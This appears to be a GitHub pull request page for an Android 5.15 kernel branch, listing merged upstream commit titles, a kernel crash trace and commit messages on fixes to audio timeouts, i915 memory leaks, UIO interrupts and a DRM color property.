| * cdd5fca7200d media: ov2680: Remove auto-gain and auto-exposure controls
| * 322a805ffdff media: i2c: ov2680: Set V4L2_CTRL_FLAG_MODIFY_LAYOUT on flips
| * abba34017e16 media: ov5640: Enable MIPI interface in ov5640_set_power_mipi()
| * 1717f67be875 USB: gadget: f_mass_storage: Fix unused variable warning
| * 121b8d30f42c media: venus: hfi_venus: Only consider sys_idle_indicator on V1
| * f6b483ead6dc media: go7007: Remove redundant if statement
| * d079a3e1ccdd platform/x86: dell-sysman: Fix reference leak
| * 426bd7418701 iommu/vt-d: Fix to flush cache of PASID directory table
| * 9dc6f660815a iommu/qcom: Disable and reset context bank before programming
| * 3274e32fc969 fsi: aspeed: Reset master errors after CFAM reset
| * 7a17deca33e1 IB/uverbs: Fix an potential error pointer dereference
| * 42d111304dd7 RDMA/hns: Fix CQ and QP cache affinity
| * b051c3bf3bdf RDMA/hns: Fix incorrect post-send with direct wqe of wr-list
| * 154822356e4d RDMA/hns: Fix port active speed
| * de4aca5b284e iommu/sprd: Add missing force_aperture
| * 46b76f13f1ad driver core: test_async: fix an error code
| * a6992ecefe5d dma-buf/sync_file: Fix docs syntax
| * d3256d80406c coresight: tmc: Explicit type conversions to prevent integer overflow
| * 93a5b461a4e1 RDMA/irdma: Replace one-element array with flexible-array member
| * 97097ea2f37e scsi: qedf: Do not touch __user pointer in qedf_dbg_fp_int_cmd_read() directly
| * 1c996be7f233 scsi: qedf: Do not touch __user pointer in qedf_dbg_debug_cmd_read() directly
| * cb6d20a8b5d7 scsi: qedf: Do not touch __user pointer in qedf_dbg_stop_io_on_error_cmd_read() directly
| * 2f0d202d82b9 x86/APM: drop the duplicate APM_MINOR_DEV macro
| * f34508d934c4 serial: sprd: Fix DMA buffer leak issue
| * c54c66d904fa serial: sprd: Assign sprd_port after initialized to avoid wrong access
| * f61fc650c478 scsi: qla4xxx: Add length check when parsing nlattrs
| * 46ad449efde1 scsi: be2iscsi: Add length check when parsing nlattrs
| * 4bd57d889099 scsi: iscsi: Add strlen() check in iscsi_if_set{_host}_p…
We need to add this new symbol as it was un-inlined in the upstream commit 9197213 ("iio: Un-inline iio_buffer_enabled()"). 1 function symbol(s) added 'bool iio_buffer_enabled(struct iio_dev *)' Bug: 308652253 Change-Id: I558a9b5144050690437bca79aa620132b6b5b560 Signed-off-by: Will McVicker <[email protected]> Signed-off-by: Greg Kroah-Hartman <[email protected]>
This catches the android13-5.15-lts branch up with a lot of recent changes that have gone into the android13-5.15 branch, including new symbols that need to be tracked properly. Included in here are the following changes: * eff6178 ANDROID: ABI: Update pixel symbol list * c43b797 Merge tag 'android13-5.15.137_r00' into android13-5.15 * d2d389f UPSTREAM: USB: core: Fix race by not overwriting udev->descriptor in hub_port_init() * f4fd913 UPSTREAM: USB: core: Change usb_get_device_descriptor() API * a0f42ba UPSTREAM: USB: core: Unite old scheme and new scheme descriptor reads * 2550d09 UPSTREAM: drm/qxl: fix UAF on handle creation * d6f794b FROMGIT: usb:gadget:uvc Do not use worker thread to pump isoc usb requests * 19914a1 FROMGIT: usb: gadget: uvc: Fix use-after-free for inflight usb_requests * d102805 FROMGIT: usb: gadget: uvc: move video disable logic to its own function * 17f7b06 FROMGIT: usb: gadget: uvc: Allocate uvc_requests one at a time * e7ed9e4 FROMGIT: usb: gadget: uvc: prevent use of disabled endpoint * b2017f5 ANDROID: fuse-bpf: Add NULL pointer check in fuse_release_in * 18865db FROMGIT: Input: uinput - allow injecting event times * e039fca ANDROID: ABI: Update oplus symbol list * 0eb66ec ANDROID: vendor_hooks: Add hooks for binder * 1696301 BACKPORT: dma-buf: add dma_fence_unwrap v2 * 67e5ffd UPSTREAM: dma-buf: Add dma_fence_array_for_each (v2) * 20b2d56 UPSTREAM: dma-buf: add dma_fence_chain_contained helper * a2a56bf BACKPORT: blk-ioprio: Introduce promote-to-rt policy * a0c7043 BACKPORT: block: Always initialize bio IO priority on submit * 739e44e BACKPORT: block: Initialize bio priority earlier * b029b53 BACKPORT: blk-ioprio: Convert from rqos policy to direct call * 0468dbf ANDROID: KVM: arm64: Fix error path in pkvm_mem_abort() * d815634 ANDROID: GKI: Add symbol list for Transsion * 690e148 ANDROID: GKI: Update symbol list for Amlogic * cd7989c ANDROID: mm: add vendor hook in isolate_freepages() * 6dcfedc UPSTREAM: kthread: dynamically allocate memory to store kthread's full name * e3eb2bb BACKPORT: firmware_loader: Abort all upcoming firmware load request once reboot triggered * 29ee427 UPSTREAM: firmware_loader: Refactor kill_pending_fw_fallback_reqs() * 46b8053 UPSTREAM: vringh: don't use vringh_kiov_advance() in vringh_iov_xfer() * e4cb5ea FROMGIT: ufs: core: wlun send SSU timeout recovery * f0033a7 ANDROID: abi_gki_aarch64_qcom: Update QCOM symbol list * 85ccc4a ANDROID: ABI: Update symbols to unisoc whitelist * c85178c UPSTREAM: netfilter: ipset: add the missing IP_SET_HASH_WITH_NET0 macro for ip_set_hash_netportnet.c * 373d867 BACKPORT: usb: gadget: uvc: Add missing initialization of ssp config descriptor * df15bb1 BACKPORT: usb: gadget: unconditionally allocate hs/ss descriptor in bind operation * 85156cf UPSTREAM: usb: gadget: f_uvc: change endpoint allocation in uvc_function_bind() * b153f0c UPSTREAM: usb: gadget: function: Remove unused declarations * 0f24a9e UPSTREAM: usb: gadget: uvc: clean up comments and styling in video_pump * ff64284 UPSTREAM: ravb: Fix use-after-free issue in ravb_tx_timeout_work() * a82ccd7 UPSTREAM: ravb: Fix up dma_free_coherent() call in ravb_remove() * 1027701 ANDROID: GKI: Update symbol list for Tuxera * d0a5b5f ANDROID: GKI: Update symbol list for Amlogic * d7644c8 ANDROID: mm: allow hooks into __alloc_pages() * 50b7fed UPSTREAM: netfilter: ipset: Fix race between IPSET_CMD_CREATE and IPSET_CMD_SWAP * e89b126 ANDROID: fuse-bpf: Add NULL pointer check in fuse_entry_revalidate * f637dd4 UPSTREAM: net: xfrm: Fix xfrm_address_filter OOB read * 72d0bfc UPSTREAM: igb: set max size RX buffer when store bad packet is enabled * 4d065e6 ANDROID: abi_gki_aarch64_qcom: Add wait_for_device_probe symbol * ac17898 ANDROID: GKI: Update symbol list for Amlogic * 488dcc0 BACKPORT: take care to handle NULL ->proc_lseek() * d4c2ea3 ANDROID: GKI: Update symbol list for Amlogic * dc8e07a ANDROID: vendor_hooks: add vendor hook in __alloc_pages() * be34ad9 UPSTREAM: netfilter: xt_sctp: validate the flag_info count * c7d73c9 BACKPORT: xhci: Keep interrupt disabled in initialization until host is running. * 9ab4afc BACKPORT: f2fs: allocate node blocks for atomic write block replacement * 48c18bb BACKPORT: f2fs: use cow inode data when updating atomic write * 3137629 BACKPORT: f2fs: fix to check return value of inc_valid_block_count() * 2dfe664 BACKPORT: f2fs: fix to check return value of f2fs_do_truncate_blocks() * f3f08c6 BACKPORT: f2fs: fix null pointer panic in tracepoint in __replace_atomic_write_block * 1625f1a BACKPORT: f2fs: synchronize atomic write aborts * 4f59336 BACKPORT: f2fs: fix to handle F2FS_IOC_START_ATOMIC_REPLACE in f2fs_compat_ioctl() * 7ce5c70 BACKPORT: f2fs: fix to abort atomic write only during do_exist() * 709e51b BACKPORT: f2fs: clear atomic_write_task in f2fs_abort_atomic_write() * 11cc01e BACKPORT: f2fs: introduce trace_f2fs_replace_atomic_write_block * c148d63 BACKPORT: f2fs: introduce F2FS_IOC_START_ATOMIC_REPLACE * a9fafdc BACKPORT: f2fs: correct i_size change for atomic writes * c964e0f BACKPORT: f2fs: change to use atomic_t type form sbi.atomic_files * 8074e8d BACKPORT: f2fs: clean up f2fs_abort_atomic_write() * 407a7bf BACKPORT: f2fs: fix null-ptr-deref in f2fs_get_dnode_of_data * 5000638 BACKPORT: f2fs: revive F2FS_IOC_ABORT_VOLATILE_WRITE * 9745174 BACKPORT: f2fs: introduce sysfs atomic write statistics * 255af4c BACKPORT: f2fs: add a sysfs entry to show zone capacity * e092319 BACKPORT: f2fs: replace F2FS_I(inode) and sbi by the local variable * 6f1a8b7 BACKPORT: f2fs: avoid unneeded error handling for revoke_entry_slab allocation * a7ad891 BACKPORT: f2fs: kill volatile write support * 76ca4a0 BACKPORT: f2fs: change the current atomic write way * 048853c UPSTREAM: netfilter: xt_u32: validate user space input * 5625502 UPSTREAM: netfilter: nfnetlink_osf: avoid OOB read * 5ccdde7 UPSTREAM: net/sched: Retire rsvp classifier * e01c180 UPSTREAM: ipv4: fix null-deref in ipv4_link_failure * bab1133 UPSTREAM: netfilter: nf_tables: disallow rule removal from chain binding * 8a0ac15 FROMGIT: usb: typec: ucsi: Clear EVENT_PENDING bit if ucsi_send_command fails * 05167f0 UPSTREAM: f2fs: fix deadlock in i_xattr_sem and inode page lock * 082a5bf UPSTREAM: mmc:block:fix in_flight[issue_type] value error * 87478bd Merge tag 'android13-5.15.123_r00' into android13-5.15 * 4655b13 UPSTREAM: net: sched: sch_qfq: Fix UAF in qfq_dequeue() * 3844902 UPSTREAM: net/sched: sch_hfsc: Ensure inner classes have fsc curve * d34029c UPSTREAM: tty: n_gsm: fix the UAF caused by race condition in gsm_cleanup_mux * 35fa353 BACKPORT: mm: page_alloc: fix CMA and HIGHATOMIC landing on the wrong buddy list * 3ac536f UPSTREAM: ARM: ptrace: Restore syscall skipping for tracers * 3c5af9e UPSTREAM: ARM: ptrace: Restore syscall restart tracing * c8443a2 ANDROID: ABI: Update oplus symbol list * 09f3b24 ANDROID: vendor_hooks: Add hooks for oem percpu-rwsem optimaton * 0007dae ANDROID: Update abi_gki_aarch64_qcom for usb typec orientation * 5d6584e ANDROID: GKI: Update symbol list for Amlogic * 46fbfc1 ANDROID: vendor_hooks: add vendor hook in xhci_urb_suitable_for_idt() * ee2fd66 ANDROID: GKI: Update symbol list for mtk * 60f97c6 ANDROID: tools/resolve_btfids: Pass CFLAGS to libsubcmd build via EXTRA_CFLAGS * 8f75dab ANDROID: libsubcmd: Hoist iterator variable declarations in parse_options_subcommand() * 9a8c25b ANDROID: enable CONFIG_USB_XHCI_PCI_RENESAS in gki_defconfig * 74e3fb4 ANDROID: GKI: Update oplus symbol list * d6c24c3 ANDROID: vendor_hooks: Add hooks for adjusting alloc_flags * c1fa53f ANDROID: uid_sys_stat: instead update_io_stats_uid_locked to update_io_stats_uid * c949fbd ANDROID: uid_sys_stat: split the global lock uid_lock to the fine-grained locks for each hlist in hash_table. * f9a1230 ANDROID: GKI: Update symbol list for Amlogic * 965abef BACKPORT: FROMLIST: ovl: get_acl: Fix null pointer dereference at realinode in rcu-walk mode * 676f9ba BACKPORT: FROMLIST: ovl: ovl_permission: Fix null pointer dereference at realinode in rcu-walk mode * 66c03b8 BACKPORT: FROMLIST: ovl: Let helper ovl_i_path_real() return the realinode * c9f0540 UPSTREAM: netfilter: nf_tables: prevent OOB access in nft_byteorder_eval * 9798dc0 ANDROID: vendor_hooks: add missing forward declare for struct cma * 734916f ANDROID: GKI: Add thermal genl vendor hook * b4d3113 ANDROID: thermal: Add vendor thermal genl check * c575790 BACKPORT: printk: ringbuffer: Fix truncating buffer size min_t cast * 154a18b ANDROID: ABI: Update symbols to unisoc whitelist * dac9a9b UPSTREAM: block/mq-deadline: Set the fifo_time member also if inserting at head * fcc3046 UPSTREAM: block/mq-deadline: Prioritize high-priority requests * 8ecb51c UPSTREAM: block/mq-deadline: Stop using per-CPU counters * 2a8fbb9 UPSTREAM: block/mq-deadline: Add an invariant check * b7deb97 UPSTREAM: block/mq-deadline: Improve request accounting further * 92babd4 BACKPORT: mm/filemap.c: fix update prev_pos after one read request done * 4097bc8 UPSTREAM: af_unix: Fix null-ptr-deref in unix_stream_sendpage(). * cc960d6 ANDROID: GKI: Update symbol list for Amlogic * d105129 ANDROID: vendor_hooks: add vendor hook in cma_alloc() * 73528dc ANDROID: GKI: Update symbol list for sunxi * 1ee5e96 ANDROID: abi_gki_aarch64_qcom: Add blk_ksm_reprogram_all_keys symbol * d4f95b5 BACKPORT: block/mq-deadline: use correct way to throttle write requests * e71ded6 BACKPORT: mm: avoid unnecessary flush on change_huge_pmd() * 49745e7 BACKPORT: mm/mprotect: do not flush when not required architecturally * 8923a83 BACKPORT: mm/mprotect: use mmu_gather * d73fc26 ANDROID: uid_sys_stats: Use llist for deferred work * f37ba43 ANDROID: uid_sys_stats: Use a single work for deferred updates * 622c141 ANDROID: fuse-bpf: Align data structs for 32-bit kernels * a1f654e ANDROID: fuse-bpf: Get correct inode in mkdir * 1594563 ANDROID: GKI: prevent removal of monitored symbols * 31c3f0e BACKPORT: net: nfc: Fix use-after-free caused by nfc_llcp_find_local * 6b6ab2b UPSTREAM: netfilter: nf_tables: deactivate catchall elements in next generation * 17f6f4f ANDROID: Fix unaligned memory access * c4a8b3a ANDROID: GKI: Update symbol list for Amlogic * f60d8b8 ANDROID: GKI: Introduce new ABI symbol list * 462a6aa ANDROID: GKI: Update abi_gki_aarch64_qcom for page_owner symbols * d403c30 ANDROID: mm: Export page_owner_inited and __set_page_owner * 0324851 FROMGIT: pstore/ram: Check start of empty przs during init * 4b2aade UPSTREAM: exfat: check if filename entries exceeds max filename length * 55bd8a9 ANDROID: GKI: Update symbol list for Amlogic * 6d71772 ANDROID: ABI: Update oplus symbol list * 0e5b290 ANDROID: vendor_hooks: Add hooks for waking up and exiting control * ae0fb8d ANDROID: Hack to support ABI stable accept_ra_min_lft * 7bd837e BACKPORT: FROMGIT: netfilter: nfnetlink_log: always add a timestamp Change-Id: I267c60244b56c3445e38267d3fd2eba53a6b05fe Signed-off-by: Greg Kroah-Hartman <[email protected]>
Merged 5.15.138 android13-5.15-lts Signed-off-by: Jeevaka Prabu Badrappan <[email protected]>
Signed-off-by: Jeevaka Prabu Badrappan <[email protected]>
VM3 reboot issue observed when playing 3A game (conqueror's blade) inside LIC. Call stack as below: [ 183.173756] BUG: unable to handle page fault for address: ffff998d47760500 [ 183.176248] #PF: supervisor read access in kernel mode [ 183.177960] #PF: error_code(0x0000) - not-present page [ 183.179596] PGD 100400067 P4D 100400067 PUD 10075d067 PMD 16d6fe067 PTE 0 [ 183.184764] Oops: 0000 [projectceladon#1] PREEMPT SMP NOPTI [ 183.186120] CPU: 1 PID: 119 Comm: kworker/1:1H Tainted: G U 5.15.119+ projectceladon#1 [ 183.188706] Workqueue: events_highpri guc_timestamp_ping [ 183.190365] RIP: 0010:__guc_context_update_clks+0x40/0x1c0 [ 183.268473] RSP: 0018:ffff998d411e7d98 EFLAGS: 00010086 [ 183.269978] RAX: ffff998d47761000 RBX: ffff96008dd66880 RCX: 0000000000000001 [ 183.271849] RDX: 000000000000000b RSI: ffffffff919e4dd1 RDI: ffff960082b73468 [ 183.273763] RBP: ffff998d411e7df0 R08: 00000003fffffffc R09: 00000000005b52ff [ 183.275721] R10: 0000000000000010 R11: ffffffff910a7e10 R12: 000000000000051e [ 183.318417] R13: ffff960082b72c80 R14: ffff960082b72c80 R15: ffff998d411e7e28 [ 183.320929] FS: 0000000000000000(0000) GS:ffff960959a40000(0000) knlGS:0000000000000000 [ 183.323387] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 183.325373] CR2: ffff998d47760500 CR3: 00000001b5cc2000 CR4: 0000000000750ee0 [ 183.327740] PKRU: 55555554 [ 183.328554] Call Trace: [ 183.329470] <TASK> [ 183.330181] ? __die_body+0x6b/0xb0 [ 183.331486] ? __die+0x9d/0xb0 [ 183.332680] ? page_fault_oops+0x383/0x3f0 [ 183.333996] ? search_bpf_extables+0xce/0xe0 [ 183.335358] ? __guc_context_update_clks+0x40/0x1c0 [ 183.336706] ? search_exception_tables+0x62/0x70 This reverts commit c01c587 to fix the VM3 reboot issue. Tests done: - VM3 boot check - VM3: Play 3A game (conqueror's blade) inside LIC without hang observed. Tracked-On: OAM-113373, OAM-113702 Signed-off-by: Zhang, Xiaolin <[email protected]>
This patch extends UIO PCI generic driver to support MSI-X interrupt. Tracked-On:projectacrn/acrn-hypervisor#5407 Signed-off-by: Yonghua Huang <[email protected]> Signed-off-by: Yuan Liu <[email protected]>
below function prototypes are extended to pass user info to uio_pci_generic driver: - ioctl - release Signed-off-by: Yonghua Huang <[email protected]>
this patch to enable per-application notification support when enabling ivhsmem doorbell feature. Signed-off-by: Yonghua Huang <[email protected]>
... in wait_for_avail() and snd_pcm_drain(). t was calculated in seconds, so it would be pretty much always zero, to be subsequently de-facto ignored due to being max(t, 10)'d. And then it (i.e., 10) would be treated as secs, which doesn't seem right. However, fixing it to properly calculate msecs would potentially cause timeouts when using twice the period size for the default timeout (which seems reasonable to me), so instead use the buffer size plus 10 percent to be on the safe side ... but that still seems insufficient, presumably because the hardware typically needs a moment to fire up. To compensate for this, we up the minimal timeout to 100ms, which is still two orders of magnitude less than the bogus minimum. substream->wait_time was also misinterpreted as jiffies, despite being documented as being in msecs. Only the soc/sof driver sets it - to 500, which looks very much like msecs were intended. Speaking of which, shouldn't snd_pcm_drain() also use substream-> wait_time? As a drive-by, make the debug messages on timeout less confusing. Tracked-On: OAM-113000 Signed-off-by: Oswald Buddenhagen <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Takashi Iwai <[email protected]>
When changing value of kcontrol, FW module to which data should be send
needs to be found. Currently it is done in improper way, fix it. Change
function name to indicate that it looks only for volume module.
This allows to change volume during runtime, instead of only changing
init value.
Tracked-On: OAM-114230
Fixes: be2b81b519d7 ("ASoC: Intel: avs: Parse control tuples")
Reviewed-by: Cezary Rojewski <[email protected]>
Signed-off-by: Amadeusz Sławiński <[email protected]>
Link: https://lore.kernel.org/r/[email protected]
Signed-off-by: Mark Brown <[email protected]>
FW GAIN module has same payload as PEAKVOL and can be used to change stream volume, code should check if either GAIN or PEAKVOL are present in path. Tracked-On: OAM-114230 Signed-off-by: Amadeusz Sławiński <[email protected]>
Fix possible wrong communication between REE and TEE. Test done: 1. Fastboot flash OK 2. adb reboot OK Tracked-On: OAM-114239 Signed-off-by: Jingdong Lu <[email protected]>
in the following commit, it has added code for if (prev) i915_request_put(prev); commit 930f3f1 (a1) Author: Janusz Krzysztofik <[email protected]> Date: Thu Jul 20 11:35:44 2023 +0200 drm/i915: Fix premature release of request's reusable memory but these two lines of code was removed by mistake in commit commit a30f5de (b1_5) Merge: 20090f4 eb99a64 Author: Jeevaka Prabu Badrappan <[email protected]> Date: Tue Dec 5 15:57:17 2023 +0530 Merge commit 'eb99a642b7e6b94282662389ff05737cb8285db9' into dev Merged 5.15.138 android13-5.15-lts It causees the request not be freed, and lead to kernel memory leak. Fix it by adding back the request free routine. Test Done: 1. Fast boot flash OK 2. adb reboot OK 3. 24-hours monkey test OK Tracked-On: OAM-114492 Signed-off-by: Xie, Chao <[email protected]>
Addition of user information to release function of uio_info structure is not taken care in all drivers resulting in build error. Fix the issue by updating the release function with user information argument. Tests done: Host and Guest kernel builds without any error in UIO drivers. Tracked-On: OAM-115388 Signed-off-by: Jeevaka Prabu Badrappan <[email protected]>
ljia5
force-pushed
the
color
branch
2 times, most recently
from
df73277
to
851f718
Compare
Add ctm_post_offset property drm ioctl interface and color post offset setting for color adjustment Signed-off-by: Lin Jia <[email protected]>
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
No description provided.